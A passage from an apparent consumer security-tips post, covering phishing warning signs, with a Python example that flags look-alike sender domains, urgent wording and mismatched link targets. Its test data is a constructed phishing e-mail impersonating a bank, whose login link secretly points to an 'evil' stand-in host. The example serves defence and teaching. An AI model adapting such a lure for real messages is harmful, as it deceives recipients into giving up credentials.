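        print(candidate, check_password(candidate))
```

The last candidate fails the character-mix rule yet has more estimated bits than the Harry Potter example, which is why the post's "make it long" tip matters most.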

    10. Be Cautious with Phishing Attempts

    Phishing is when scammers try to trick you into giving them your personal information, like passwords or credit card numbers, by pretending to be someone you trust. They often do this through fake emails, messages, or websites. Being cautious helps you avoid these traps and keeps your information safe.

    • Check the Sender’s Email Address: Scammers often use addresses that look similar to real ones but have slight differences.
    • Look for Red Flags: Be suspicious of emails or messages with urgent requests, bad grammar, or unfamiliar links.
    • Don’t Click on Suspicious Links: Hover over links to see where they lead before clicking. If it looks suspicious, don’t click.
    • Verify Requests: If you get an email or message asking for personal information, verify it by contacting the company directly using a phone number or website you know is legitimate.
    • Use Anti-Phishing Tools: Many email services and web browsers have built-in tools to help detect and block phishing attempts.

    Always question messages that ask for personal information or seem unusual. It’s okay to be curious and skeptical – it’s better to be safe than sorry.
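As an added example (not part of the post), the checks from the list above run over a constructed HTML e-mail: the sender's domain is compared with a trusted list, urgent wording is flagged, and each link's visible text is compared with its real href target, which is what "hover over links" reveals. All domains are invented .example names.

```python
from email import message_from_string
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed for the demo: the only domain the recipient's bank really uses.
TRUSTED_DOMAINS = {"examplebank.example"}
URGENT_PHRASES = ("immediately", "account will be suspended", "verify now")

# Constructed sample message; note the digit "1" in the sender domain and the
# link whose visible text differs from its actual target.
SAMPLE_EMAIL = """\
From: Example Bank <security@examp1ebank.example>
To: customer@example.org
Subject: Verify your account immediately
Content-Type: text/html

<p>Your account will be suspended. Click
<a href="http://login.evil.example/reset">https://www.examplebank.example/login</a>
to verify now.</p>
"""


class LinkCollector(HTMLParser):
    """Collects (href, visible text) pairs for every <a> in the HTML body."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href"), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def phishing_red_flags(raw: str) -> list:
    """Return a list of human-readable red flags found in a raw e-mail."""
    msg = message_from_string(raw)
    flags = []
    _, addr = parseaddr(msg["From"] or "")
    sender_domain = addr.rsplit("@", 1)[-1].lower()
    if sender_domain not in TRUSTED_DOMAINS:
        flags.append(f"sender domain {sender_domain} is not a trusted domain")
    body = msg.get_payload()
    text = ((msg["Subject"] or "") + " " + body).lower()
    if any(p in text for p in URGENT_PHRASES):
        flags.append("urgent wording")
    parser = LinkCollector()
    parser.feed(body)
    for href, visible in parser.links:
        shown = urlparse(visible).hostname if visible.startswith("http") else None
        actual = urlparse(href).hostname
        if shown and actual and shown != actual:
            flags.append(f"link text shows {shown} but points to {actual}")
    return flags
```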
